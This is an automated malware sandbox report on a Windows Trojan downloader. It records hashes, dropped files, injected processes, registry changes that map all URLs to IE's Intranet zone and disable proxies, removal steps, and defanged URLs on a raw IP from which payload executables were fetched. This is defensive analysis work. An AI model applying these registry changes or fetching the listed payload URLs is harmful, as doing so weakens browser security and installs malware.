Trojan.Win32.Badur.gvnz (Kaspersky), Dropped:Trojan.Generic.11176292 (AdAware), Trojan-Banker.Win32.Brasil.FD, Trojan-Downloader.Win32.Karagany.1.FD, Trojan.NSIS.StartPage.FD, Trojan.Win32.Delphi.FD, Trojan.Win32.Sasfis.FD, Trojan.Win32.Swrort.3.FD, VirTool.Win32.DelfInject.FD, TrojanSwrort.YR (Lavasoft MAS)Behaviour: Trojan-Downloader, Banker, Trojan, VirTool
The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.
Summary
MD5: 4dc3d0c729444611a6a79c50a6c35493
SHA1: d8a92c6781024c67b958f9240ae209017e74e152
SHA256: e54fc6d154a86b2d9e7d173baa7673cfea18e13f34c2712aa3a7745cb0defa80
SSDeep: 12288:OUWA3Aheuswy1oAAOcekSkrHN/g8lCYc9/YeDOLdZ:OUWqist1oQcezAIEeeZ
Size: 549526 bytes
File type: EXE
Platform: WIN32
Entropy: Packed
PEID: UPolyXv05_v6
Company:
Created at: 2009-08-16 14:05:35
Analyzed on: WindowsXP SP3 32-bit
Summary: Trojan. A program that appears to do one thing but actually does another (a.k.a. Trojan Horse).
Dynamic Analysis
Payload
No specific payload has been found.
Process activity
The Trojan creates the following process(es):
axuls.exe:1884
%original file name%.exe:1008
axult.exe:3272
setup_open_341.exe:3924
The Trojan injects its code into the following process(es):
IFoxInstall-y-c203945859-run-s-x.exe:1472
setup_qd304.exe:404
vsgrtaho.exe:2880
WJSpeed.exe:1928
File activity
The process IFoxInstall-y-c203945859-run-s-x.exe:1472 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\IFoxInfo.ini (177 bytes)
The process axuls.exe:1884 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Program Files%\vsgrtaho\hzsoft\LD_2075_S.exe (127126 bytes)
%Program Files%\vsgrtaho\hzsoft\IFoxInstall-y-c203945859-run-s-x.exe (21985 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\3F9KLW6F\LD_2075_S[1].exe (186680 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\1GGYBZUQ\IFoxInstall-y-c203945859-run-s-x[1].exe (47885 bytes)
The process %original file name%.exe:1008 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Program Files%\vsgrtaho\dciman32.dll (8 bytes)
%Program Files%\vsgrtaho\d3dim.dll (13480 bytes)
%Program Files%\vsgrtaho\ialmuDAN.dll (1151 bytes)
%Program Files%\vsgrtaho\devmgr.dll (10953 bytes)
%Program Files%\vsgrtaho\dmocx.dll (3576 bytes)
%Program Files%\vsgrtaho\vsgrtaho.exe (8912 bytes)
The Trojan deletes the following file(s):
%Program Files%\vsgrtaho\__tmp_rar_sfx_access_check_835437 (0 bytes)
The process axult.exe:3272 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\1GGYBZUQ\setup_qd304[1].exe (22097 bytes)
%Program Files%\vsgrtaho\hzsoft\setup_qd304.exe (13036 bytes)
The process setup_qd304.exe:404 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\nsw3.tmp\metadl.dll (12024 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw3.tmp\System.dll (11 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsq2.tmp (8533 bytes)
The Trojan deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\nsb1.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw3.tmp (0 bytes)
The process vsgrtaho.exe:2880 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Program Files%\vsgrtaho\axuls.exe (48584 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OVYHJBCC\softcount[1].htm (109 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\1GGYBZUQ\s[1].js (16338 bytes)
%Documents and Settings%\%current user%\Cookies\K97JA7U2.txt (114 bytes)
%Program Files%\vsgrtaho\axult.exe (37839 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\1GGYBZUQ\setup_open_341[1].exe (221714 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\3F9KLW6F\stat[1].gif (43 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\1GGYBZUQ\core[1].php (801 bytes)
%Documents and Settings%\%current user%\Cookies\VIKS2VP0.txt (92 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OVYHJBCC\popup[1].htm (627 bytes)
%Program Files%\vsgrtaho\setup_open_341.exe (107337 bytes)
%Program Files%\vsgrtaho\pwb.dll (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\SZIS9VJF\axult[1].exe (40088 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\3F9KLW6F\pwb[1].htm (1194 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OVYHJBCC\axuls[1].exe (49352 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\1GGYBZUQ\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OVYHJBCC\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Cookies\5MWCFYER.txt (173 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\SZIS9VJF\stat[1].php (1177 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\3F9KLW6F\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\SZIS9VJF\pic[1].gif (719 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\SZIS9VJF\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Cookies\2JXVETA1.txt (94 bytes)
The Trojan deletes the following file(s):
%Program Files%\vsgrtaho\pwb.dll (0 bytes)
The process setup_open_341.exe:3924 makes changes in the file system.
The Trojan deletes the following file(s):
C:\ (0 bytes)
Registry activity
The process IFoxInstall-y-c203945859-run-s-x.exe:1472 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "2B 83 F4 B0 41 D1 36 46 1E D7 44 B2 D9 AB F2 A8"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "46 00 00 00 46 00 00 00 01 00 00 00 00 00 00 00"
The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass" = "1"
The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:
"UNCAsIntranet" = "1"
The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:
"IntranetName" = "1"
Proxy settings are disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The Trojan deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"
The process axuls.exe:1884 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "FC 5B 48 24 6E 1F 98 4C 29 D1 1F 19 D6 FE FD 06"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "46 00 00 00 42 00 00 00 01 00 00 00 00 00 00 00"
The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass" = "1"
The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:
"UNCAsIntranet" = "1"
The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:
"IntranetName" = "1"
Proxy settings are disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The Trojan deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"
The process %original file name%.exe:1008 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "F7 62 C4 C8 84 C2 4B 27 9B D0 D9 F2 5D 2B 4C 4D"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{fdd9f6f3-7454-11e2-b4cd-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{773a730e-74fb-11e2-b597-000c293bdf2f}]
"BaseClass" = "Drive"
[HKCU\Software\WinRAR SFX]
"C%%Program Files%vsgrtaho" = "%Program Files%\vsgrtaho"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{fdd9f6f2-7454-11e2-b4cd-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\%Program Files%\vsgrtaho]
"vsgrtaho.exe" = "vsgrtaho"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{fdd9f6f5-7454-11e2-b4cd-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
"Personal" = "%Documents and Settings%\%current user%\My Documents"
The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass" = "1"
The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:
"IntranetName" = "1"
The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:
"UNCAsIntranet" = "1"
The process axult.exe:3272 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "49 23 32 36 9A 90 BF B5 E1 55 8B 82 05 E4 09 AD"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "46 00 00 00 44 00 00 00 01 00 00 00 00 00 00 00"
The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass" = "1"
The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:
"UNCAsIntranet" = "1"
The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:
"IntranetName" = "1"
Proxy settings are disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The Trojan deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"
The process setup_qd304.exe:404 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "DB AF 98 0D 3D AB E9 FB 9F 1C 16 D6 9E 2E F4 DD"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{773a730e-74fb-11e2-b597-000c293bdf2f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{fdd9f6f3-7454-11e2-b4cd-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{fdd9f6f5-7454-11e2-b4cd-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{fdd9f6f2-7454-11e2-b4cd-806d6172696f}]
"BaseClass" = "Drive"
The process vsgrtaho.exe:2880 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKCU\Software\Microsoft\Internet Explorer\International\CpMRU]
"Size" = "10"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{fdd9f6f3-7454-11e2-b4cd-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"
[HKCU\Software\Microsoft\Internet Explorer\International\CpMRU]
"InitHits" = "100"
[HKCU\Software\Microsoft\Internet Explorer\International]
"W2KLpk" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
"Personal" = "%Documents and Settings%\%current user%\My Documents"
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
"Local AppData" = "%Documents and Settings%\%current user%\Local Settings\Application Data"
[HKCU\Software\Microsoft\Internet Explorer\International\CpMRU]
"Enable" = "1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKCU\Software\Microsoft\Internet Explorer\International\CpMRU]
"Factor" = "20"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{fdd9f6f2-7454-11e2-b4cd-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "46 00 00 00 41 00 00 00 01 00 00 00 00 00 00 00"
[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\%Program Files%\vsgrtaho]
"setup_open_341.exe" = "æâ€â€Ã‚ Ã¦Å¾ÂÂ影音安装程åºÂÂ"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "8A CA 54 9D B3 37 DA BF E1 8E DF 4D FB 8B D2 F3"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{773a730e-74fb-11e2-b597-000c293bdf2f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"
[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\%Program Files%\vsgrtaho]
"axult.exe" = "axult"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{fdd9f6f5-7454-11e2-b4cd-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\%Program Files%\vsgrtaho]
"axuls.exe" = "axuls"
The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"
The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:
"ProxyBypass" = "1"
Proxy settings are disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"
The Trojan deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"
The process setup_open_341.exe:3924 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "CE 2B A5 38 F0 27 B5 76 AF D8 92 9B 0A 1F 56 F4"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{fdd9f6f3-7454-11e2-b4cd-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{773a730e-74fb-11e2-b597-000c293bdf2f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Programs" = "%Documents and Settings%\%current user%\Start Menu\Programs"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{fdd9f6f2-7454-11e2-b4cd-806d6172696f}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{fdd9f6f5-7454-11e2-b4cd-806d6172696f}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\wjplay2]
"RD" = "_20140503022256"
The Trojan deletes the following value(s) in system registry:
The Trojan disables automatic startup of the application by deleting the following autorun value:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"WJNews"
"wjplay2"
"WujiPlayer"
"wjplay2_News"
Dropped PE files
MD5 | File path |
---|---|
62e64ea696a89db9de143ba581c103d6 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temporary Internet Files\Content.IE5\OVYHJBCC\axuls[1].exe |
18507ce9bd6114ed575a40b8fc55839b | c:\Program Files\vsgrtaho\d3dim.dll |
7c8db6e5acc97e8f8064a2f5c6244c67 | c:\Program Files\vsgrtaho\dciman32.dll |
3da9208f5816252fedd948433e4b123d | c:\Program Files\vsgrtaho\devmgr.dll |
88441504bc80f3f8f8469e01e860f4e1 | c:\Program Files\vsgrtaho\dmocx.dll |
35c4650ee5f1c353b8bbdcd4c1a2abef | c:\Program Files\vsgrtaho\ialmuDAN.dll |
49e5fb3a44d171393fa72e5843c659bb | c:\Program Files\vsgrtaho\vsgrtaho.exe |
HOSTS file anomalies
No changes have been detected.
Rootkit activity
No anomalies have been detected.
Propagation
Removals
Remove it with Ad-Aware
- Click (here) to download and install Ad-Aware Free Antivirus.
- Update the definition files.
- Run a full scan of your computer.
Manual removal*
- Terminate malicious process(es) (How to End a Process With the Task Manager):
axuls.exe:1884
%original file name%.exe:1008
axult.exe:3272
setup_open_341.exe:3924 - Delete the original Trojan file.
- Delete or disinfect the following files created/modified by the Trojan:
%Documents and Settings%\%current user%\Local Settings\Temp\IFoxInfo.ini (177 bytes)
%Program Files%\vsgrtaho\hzsoft\LD_2075_S.exe (127126 bytes)
%Program Files%\vsgrtaho\hzsoft\IFoxInstall-y-c203945859-run-s-x.exe (21985 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\3F9KLW6F\LD_2075_S[1].exe (186680 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\1GGYBZUQ\IFoxInstall-y-c203945859-run-s-x[1].exe (47885 bytes)
%Program Files%\vsgrtaho\dciman32.dll (8 bytes)
%Program Files%\vsgrtaho\d3dim.dll (13480 bytes)
%Program Files%\vsgrtaho\ialmuDAN.dll (1151 bytes)
%Program Files%\vsgrtaho\devmgr.dll (10953 bytes)
%Program Files%\vsgrtaho\dmocx.dll (3576 bytes)
%Program Files%\vsgrtaho\vsgrtaho.exe (8912 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\1GGYBZUQ\setup_qd304[1].exe (22097 bytes)
%Program Files%\vsgrtaho\hzsoft\setup_qd304.exe (13036 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw3.tmp\metadl.dll (12024 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw3.tmp\System.dll (11 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsq2.tmp (8533 bytes)
%Program Files%\vsgrtaho\axuls.exe (48584 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OVYHJBCC\softcount[1].htm (109 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\1GGYBZUQ\s[1].js (16338 bytes)
%Documents and Settings%\%current user%\Cookies\K97JA7U2.txt (114 bytes)
%Program Files%\vsgrtaho\axult.exe (37839 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\1GGYBZUQ\setup_open_341[1].exe (221714 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\3F9KLW6F\stat[1].gif (43 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\1GGYBZUQ\core[1].php (801 bytes)
%Documents and Settings%\%current user%\Cookies\VIKS2VP0.txt (92 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OVYHJBCC\popup[1].htm (627 bytes)
%Program Files%\vsgrtaho\setup_open_341.exe (107337 bytes)
%Program Files%\vsgrtaho\pwb.dll (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\SZIS9VJF\axult[1].exe (40088 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\3F9KLW6F\pwb[1].htm (1194 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OVYHJBCC\axuls[1].exe (49352 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\1GGYBZUQ\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OVYHJBCC\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Cookies\5MWCFYER.txt (173 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\SZIS9VJF\stat[1].php (1177 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\3F9KLW6F\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\SZIS9VJF\pic[1].gif (719 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\SZIS9VJF\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Cookies\2JXVETA1.txt (94 bytes) - Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
- Reboot the computer.
Static Analysis
VersionInfo
No information is available.
No information is available.
PE Sections
Name | Virtual Address | Virtual Size | Raw Size | Entropy | Section MD5 |
---|---|---|---|---|---|
.text | 4096 | 67196 | 67584 | 4.54827 | 5c4d5ace2672731f58b9d31b4d21f13f |
.rdata | 73728 | 6101 | 6144 | 3.82125 | 019ad0f666e2ac17292e5d20e1bdf6c3 |
.data | 81920 | 49140 | 512 | 2.45613 | 2821477811bfd11f4acd2c1da2aba6da |
.CRT | 131072 | 16 | 512 | 0.147711 | 324bcdad78da9eab2e1651550291e550 |
.rsrc | 135168 | 15968 | 16384 | 2.48941 | 6de80162196c057ba9b8df5bec2720bc |
Dropped from:
Downloaded by:
Similar by SSDeep:
Similar by Lavasoft Polymorphic Checker:
Total found: 10
805336f522845a87a6d31561b677a73d
98bd7ee8466484a43feafde8e5bd6c88
40794fca5f8bbb0c3d14f2776644f38b
f5954d52890b4483c7c48680951ac196
f8d68e474374caf20da173e457cbfce3
5bd62a5240b55b1989fb8fff09a28747
e8cbd7071ca3c2ab7c3e94510e096bd5
f35a332dcc6d77b96c2b505f16456e1b
cf08ae4c78e3493017a207ae7a352a1c
6b1c701c5e3c6c2caa5cc171ced8f7f1
Network Activity
URLs
URL | IP |
---|---|
hxxp://c.split.cnzz.com/stat.php?id=4327411&web_id=4327411&show=pic | |
hxxp://cbjs.e.shifen.com/js/s.js | |
hxxp://c.split.cnzz.com/core.php?web_id=4327411&show=pic&t=z | |
hxxp://z6.cnzz.com/stat.htm?id=4327411&r=&lg=en-us&ntime=none&repeatip=0&rtime=0&cnzz_eid=1731199553-1399090397-&showp=1176x885&st=0&sin=&t=&rnd=781481770 | |
hxxp://pcookie.split.cnzz.com/9.gif?abc=1&rnd=1744112357 | |
hxxp://icon.cnzz.com/img/pic.gif | 42.156.162.7 |
hxxp://pcookie.split.cnzz.com/app.gif?&cna=3lrrC1t5szUCAbhrJibxV mH | |
hxxp://211.101.12.49/ad/softad/pwb.htm | |
hxxp://211.101.12.49/dls/axuls.exe | |
hxxp://211.101.12.49/dls/axult.exe | |
cbjs.baidu.com | 123.125.65.120 |
pcookie.cnzz.com | 42.120.219.171 |
hzs2.cnzz.com | 42.156.140.19 |
c.cnzz.com | 42.120.219.6 |
cnzz.mmstat.com | 42.120.219.171 |
s85.cnzz.com | 1.99.192.16 |
IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)
Traffic
GET /img/pic.gif HTTP/1.1
Accept: */*
Referer: hXXp://adsvc2.9365.info/count/softcount/?pwb
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C; .NET4.0E)
Host: icon.cnzz.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Server: Tengine/1.3.0
Date: Sat, 03 May 2014 04:13:18 GMT
Content-Type: image/gif
Content-Length: 719
Last-Modified: Fri, 16 Jan 2009 08:10:47 GMT
Connection: keep-alive
Keep-Alive: timeout=5
Expires: Sun, 04 May 2014 04:13:18 GMT
Cache-Control: max-age=86400
Accept-Ranges: bytes
